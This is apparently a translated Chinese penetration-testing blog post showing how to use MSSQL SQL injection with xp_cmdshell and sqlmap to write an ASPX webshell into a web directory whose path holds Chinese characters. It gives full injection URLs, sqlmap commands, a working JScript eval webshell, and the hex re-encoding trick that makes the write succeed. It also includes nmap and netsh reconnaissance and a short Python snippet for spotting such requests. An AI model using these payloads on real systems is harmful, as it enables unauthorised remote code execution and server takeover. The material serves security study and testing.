
MSSQL high-privilege injection: writing a webshell to a path containing Chinese characters

2022-06-24 07:30:00 Xiaoxiang Xin'an

Statement: Most articles on this official account come from the author's daily notes; a few are reproduced with the authorization of the original author or other official accounts. Unauthorized reprinting is strictly prohibited; if you want to reprint, contact the author first. Do not use the techniques in this article for illegal testing; any adverse consequences arising from doing so are unrelated to the author and this official account.

0x01 Preface

On the way home from work I was scrolling through the chat log of the "Xiaoxiang Xin'an technology exchange group" on my phone and noticed that @Bob and @goddemon were both very interested in a question that had come up. A few days earlier I had tested a similar problem for friends, and I happened to have a matching local test environment, so when I got home I helped test it and wrote up this record. The process was quite interesting.

0x02 Target host 1: problem description

MSSQL high-privilege injection: sqlmap's os-shell can call xp_cmdshell to execute commands. The web server and database server are separate hosts, and the database server has no outbound network access; from his analysis he guessed that the host could not reach the internet because it has no gateway configured.

So he wanted to set a gateway with the following command to bring the host online and then continue testing. The command failed, however, because the network card's connection name contains Chinese characters; writing the command into a batch file before executing it also failed.

netsh int ip set address "本地连接" static 192.168.1.103 255.255.255.0 192.168.1.1

However, the following figure shows that the Chinese characters are written into the batch file correctly; they only become garbled when the file is read and executed, so the command fails. My guess was that the problem lies with sqlmap.

0x03 Target host 2: problem description

MSSQL high-privilege injection: sqlmap's os-shell can call xp_cmdshell to execute commands, and the web server and database are on the same host. However, files cannot be written because the absolute path of the target website contains Chinese characters; the error is: The system could not find the specified path.

sqlmap -u "http://192.168.1.108/sql.aspx?id=1" --os-shell --batch

This host also has no outbound network access. I built a local environment with no gateway configured, so it is not possible to get a shell by remote download and similar methods, or to obtain a CS/MSF session. There is not much to say about exploiting a host that is online; everyone can handle that.

While looking into why the host could not reach the internet, I first thought the firewall had inbound and outbound rules configured; if so, it would only take a netsh command to turn the firewall off. Querying it, however, showed that the firewall was not enabled at all.

netsh advfirewall show allprofile

This host's IP belongs to a certain organization's private network. It blocks ping, and an Nmap scan with the -Pn parameter found only port 80 open, so most likely some device restricts inbound and outbound traffic and allows only port 80 through. This is just a personal guess and was not verified further.

nmap -sV -Pn 210.**.***.159

OK, this is drifting further and further off topic. Back to the point; let's continue.

0x04 Writing the webshell manually through the browser

Execute the following SQL statement after the injection point in Google Chrome to write the webshell to the Chinese path. When writing the shell, the angle brackets <> must first be escaped with ^, otherwise the write fails with the cmd.exe error: There should not be > (the Chinese wording of "> was unexpected at this time").

;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%%eval(Request.Item["xxxasec"],"unsafe");%^> > C:\inetpub\wwwroot\中文测试\shell.aspx'--

The Firefox Hackbar plugin execution error mentioned in @5号黑区's blog was also tested; that problem did not occur here. My guess is that it was an encoding or plugin issue with the Firefox browser at the time; pay attention to this in real engagements.

Brief analysis :

Why can the browser write to the Chinese path? Because the browser's encoding is UTF-8 and the injected page's encoding is also UTF-8, the Chinese characters are recognised, and the browser URL-encodes the Chinese path as UTF-8. Capture the packet in BurpSuite and decode it to see:

Before decoding :

/sql.aspx?id=1;exec%20master..xp_cmdshell%20%27echo%20^%3C%@%20Page%20Language=%22Jscript%22%^%3E^%3C%%eval(Request.Item[%22xxxasec%22],%22unsafe%22);%^%3E%20%3E%20C:\inetpub\wwwroot\%E4%B8%AD%E6%96%87%E6%B5%8B%E8%AF%95\shell.aspx%27--

After decoding :

/sql.aspx?id=1;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%%eval(Request.Item["xxxasec"],"unsafe");%^> > C:\inetpub\wwwroot\中文测试\shell.aspx'--

Note: the browser's default encoding is UTF-8; if it is changed to GBK or another encoding, the Chinese path cannot be written. Many encoding issues deserve attention in penetration testing: the browser, the web page character set, the database, the command terminal's code page, and so on. Garbled characters caused by encoding mismatches are common, showing up as files that cannot be read or written or as Chinese output that comes back garbled.

0x05 Writing the webshell from sqlmap's sql-shell

Entering sqlmap's sql-shell and executing the following SQL statement also writes the webshell to the Chinese path. Why? BurpSuite packet analysis shows that this is actually the same as the browser case: sqlmap also URL-encodes the Chinese path as UTF-8.

sqlmap -u "http://192.168.1.109/sql.aspx?id=1" --sql-shell --batch --proxy http://127.0.0.1:8080
exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%%eval(Request.Item["xxxasec"],"unsafe");%^> > C:\inetpub\wwwroot\中文测试\shell1.aspx'

Before decoding :

/sql.aspx?id=1%3BEXEC%20master..xp_cmdshell%20%27echo%20%5E%3C%25%40%20Page%20Language%3D%22Jscript%22%25%5E%3E%5E%3C%25%25eval%28Request.Item%5B%22xxxasec%22%5D%2C%22unsafe%22%29%3B%25%5E%3E%20%3E%20C%3A%5Cinetpub%5Cwwwroot%5C%E4%B8%AD%E6%96%87%E6%B5%8B%E8%AF%95%5Cshell1.aspx%27--

After decoding :

/sql.aspx?id=1;EXEC master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%%eval(Request.Item["xxxasec"],"unsafe");%^> > C:\inetpub\wwwroot\中文测试\shell1.aspx'--

Note: what the two brothers ran into was that, in MSSQL high-privilege injection, commands containing Chinese characters could not be executed from sqlmap's os-shell. At the time I found the two workarounds above in local testing, but both of them said the workarounds did not succeed in their real engagements, so the problem was clearly not fully solved. This also shows that local tests differ from real scenarios, and problems have to be analysed according to the actual situation.

0x06 Writing the webshell from sqlmap's os-shell

I decided to look again at why sqlmap's os-shell cannot execute commands containing Chinese characters. I kept using BurpSuite to capture the os-shell echo write packet; executing the command directly still gives: The system could not find the specified path.

sqlmap -u "http://192.168.1.109/sql.aspx?id=1" --os-shell --batch --proxy http://127.0.0.1:8080
echo ^<%@ Page Language="Jscript"%^>^<%%eval(Request.Item["xxxasec"],"unsafe");%^> > C:\inetpub\wwwroot\中文测试\shell2.aspx

Before decoding :

/sql.aspx?id=1%3BDECLARE%20%40clit%20VARCHAR%288000%29%3BSET%20%40clit%3D0x6563686f205e3c25402050616765204c616e67756167653d224a73637269707422255e3e5e3c25256576616c28526571756573742e4974656d5b2278787861736563225d2c22756e7361666522293b255e3e203e20433a5c696e65747075625c777777726f6f745ce4b8ade69687e6b58be8af955c7368656c6c322e61737078%3BINSERT%20INTO%20sqlmapoutput%28data%29%20EXEC%20master..xp_cmdshell%20%40clit--

After decoding :

/sql.aspx?id=1;DECLARE @clit VARCHAR(8000);SET @clit=0x6563686f205e3c25402050616765204c616e67756167653d224a73637269707422255e3e5e3c25256576616c28526571756573742e4974656d5b2278787861736563225d2c22756e7361666522293b255e3e203e20433a5c696e65747075625c777777726f6f745ce4b8ade69687e6b58be8af955c7368656c6c322e61737078;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @clit--

Both spaces and symbols have been URL-encoded, which makes the packet hard to read. URL-decode it first, and a hex (UTF-8) encoded string appears in the decoded content; decoding that hex gives the echo write command we executed.

Before decoding :

0x6563686f205e3c25402050616765204c616e67756167653d224a73637269707422255e3e5e3c25256576616c28526571756573742e4974656d5b2278787861736563225d2c22756e7361666522293b255e3e203e20433a5c696e65747075625c777777726f6f745ce4b8ade69687e6b58be8af955c7368656c6c322e61737078

After decoding :

echo ^<%@ Page Language="Jscript"%^>^<%%eval(Request.Item["xxxasec"],"unsafe");%^> > C:\inetpub\wwwroot\中文测试\shell2.aspx

Because the cmd.exe terminal that xp_cmdshell calls uses GBK, the decoded write command has to be hex-encoded again as GB2312; then, in BurpSuite, replace the HEX(UTF-8) string in the original packet with the new one and resubmit.

After the coding :

6563686F205E3C25402050616765204C616E67756167653D224A73637269707422255E3E5E3C25256576616C28526571756573742E4974656D5B2278787861736563225D2C22756E7361666522293B255E3E203E20433A5C696E65747075625C777777726F6F745CD6D0CEC4B2E2CAD45C7368656C6C322E61737078

At this point we can see that the webshell has been written to the Chinese path successfully. This method fully solves the problem the two brothers ran into: sqlmap's os-shell being unable to execute commands containing Chinese characters in MSSQL high-privilege injection.

0x07 Conclusion

Investigating the problem the two brothers encountered shows that the root cause is inconsistent encoding; once the encoding problem is solved, nothing else is a problem. You can study the differences between UTF-8 and GB2312 in URL and hex encoding on your own.

1. The browser and sqlmap default to UTF-8, so when submitting the SQL statement, the URL encoding of the Chinese path must also be UTF-8. Submitting it with a GB2312 URL encoding definitely will not work, because the Chinese path would still be garbled.

2. sqlmap's os-shell parameter uses xp_cmdshell to execute commands through cmd.exe. The default code page of cmd and powershell is 936 (Simplified Chinese GBK), while sqlmap submits its packets in UTF-8 by default, so the characters come out garbled.
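As an added example (not code from the original post or from sqlmap), the following Python looks at request lines of the shape captured in section 0x06 from the defender's side: it URL-decodes them, expands any 0x hex literal under both UTF-8 and GBK (code page 936), and flags xp_cmdshell use. The two hex constants are the literals shown above; the request lines built around them are constructed samples.

```python
import re
from urllib.parse import unquote

# Hex literals taken from the two packets analysed above: the first is the
# command as sqlmap hex-encoded it (UTF-8 bytes), the second is the same
# command re-encoded as GB2312 so that cmd.exe (code page 936) reads the path.
HEX_UTF8 = "6563686f205e3c25402050616765204c616e67756167653d224a73637269707422255e3e5e3c25256576616c28526571756573742e4974656d5b2278787861736563225d2c22756e7361666522293b255e3e203e20433a5c696e65747075625c777777726f6f745ce4b8ade69687e6b58be8af955c7368656c6c322e61737078"
HEX_GB2312 = "6563686F205E3C25402050616765204C616E67756167653D224A73637269707422255E3E5E3C25256576616C28526571756573742E4974656D5B2278787861736563225D2C22756E7361666522293B255E3E203E20433A5C696E65747075625C777777726F6F745CD6D0CEC4B2E2CAD45C7368656C6C322E61737078"

# Constructed sample request lines in the shape of the sqlmap os-shell packet.
SAMPLE_REQUESTS = [
    "/sql.aspx?id=1%3BDECLARE%20%40clit%20VARCHAR%288000%29%3BSET%20%40clit%3D0x"
    + HEX_UTF8 + "%3BINSERT%20INTO%20sqlmapoutput%28data%29%20EXEC%20master..xp_cmdshell%20%40clit--",
    "/sql.aspx?id=1%3BDECLARE%20%40clit%20VARCHAR%288000%29%3BSET%20%40clit%3D0x"
    + HEX_GB2312 + "%3BEXEC%20master..xp_cmdshell%20%40clit--",
    "/sql.aspx?id=1",  # benign request for comparison
]

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
# Strings a WAF or log rule would look for once the literal is expanded.
INDICATORS = ("xp_cmdshell", "sqlmapoutput", "echo ", ".aspx", "inetpub")


def decode_hex_literal(hex_digits: str) -> dict:
    """Decode a T-SQL 0x... literal as UTF-8 (what the browser and sqlmap emit)
    and as GBK/cp936 (what cmd.exe reads); None means invalid in that encoding."""
    raw = bytes.fromhex(hex_digits)
    views = {}
    for name in ("utf-8", "gbk"):
        try:
            views[name] = raw.decode(name)
        except UnicodeDecodeError:
            views[name] = None
    return views


def inspect_request(request_line: str) -> dict:
    """URL-decode one request line, expand every hex literal under both
    encodings, and report which indicators appear in any decoded view."""
    decoded = unquote(request_line)
    findings = {"hex_literals": [], "indicators": set(), "suspicious": False}
    views = [decoded]
    for match in HEX_LITERAL.finditer(decoded):
        texts = decode_hex_literal(match.group(1))
        findings["hex_literals"].append(texts)
        views.extend(t for t in texts.values() if t)
    for view in views:
        low = view.lower()
        findings["indicators"].update(i for i in INDICATORS if i in low)
    findings["suspicious"] = "xp_cmdshell" in findings["indicators"]
    return findings
```

Decoding under both code pages is the point: the UTF-8 literal only yields the readable path in the UTF-8 view, while the GB2312 literal is not valid UTF-8 at all and only reads correctly in the GBK view, which is exactly the mismatch the post traces.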

0x08 Reference links

https://forum.90sec.org/thread-9716-1-1.html

https://blog.csdn.net/langkew/article/details/7888242

http://www.voidcn.com/article/p-nnhyesle-bms.html

http://www.dark5.net/blog/2019/06/18/SQLmap Write shell Encountered Chinese path solution set /


Copyright notice
This article was written by [Xiaoxiang Xin'an]; please include the original link when reposting. Thank you.
https://yzsam.com/2021/07/20210701115810080k.html
